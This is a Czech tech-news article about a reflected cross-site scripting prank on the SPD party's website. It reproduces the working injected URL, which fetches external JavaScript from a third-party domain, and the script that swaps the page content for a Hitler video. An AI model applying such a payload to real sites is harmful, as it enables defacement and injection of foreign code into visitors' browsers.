Na stránkách Okamurovy strany se zjevil Hitler. Může za to vtípek s XSS

Na stránkách Okamurovy strany se zjevil Hitler. Může za to vtípek s XSS

Chcete se dozvědět, jak fungují některé útoky typu cross-site scripting (XSS)? V tom případě navštivte tuto upravenou adresu vedoucí na web Okamurovy SPD. Možná to ještě bude fungovat.

Web se sice načte, ale když se podíváte do adresního řádku, je tam drobný kód, který načte externí javascriptový soubor a ten pak už pomocí knihovny jQuery konečně změní původní HTML obsah za vtipné video s Adolfem z YouTube.

Upravená webová adresa, která načte cizí kód:

www.spd.cz/akce?date=2017-09-11%27);$.getScript(%27http://www.krtek.net/spd.js%27);$(%27#kokoti&month=09&year=2017

Kód v externím souboru, který se načetl z cizí domény:

$('.col-md-8 .news').html('<h1>Hitler nebyl uplne spatnej, zabil Hitlera...</h1><iframe width="750" height="421" src="https://www.youtube.com/embed/Qr_TaMfN56c?autoplay=1" frameborder="0" allowfullscreen></iframe>');

Nejedná se o útok v pravém slova smyslu, kdy autor pronikne do systému svého cíle, protože se vše odehrává pouze v prohlížeči surfaře. Mediální efekt ale může být stejný.

Klepněte pro větší obrázek
Web SPD je náchylný k podobným hackům

Témata článku: YouTube, Web, Zajímavosti, Hacking, Politika, Pravé slovo, Externí soubor, Adresní řádek, HTML, Vtipné video, Krtek, Kód, XSS, Vtípek, Okamura, Spd, Cizí kód

Určitě si přečtěte


Aktuální číslo časopisu Computer

26 procesorů v důkladném testu

Zhodnotili jsme 18 bezdrátových reproduktorů

Jak fungují cash back služby?

Pohlídejte své děti na internetu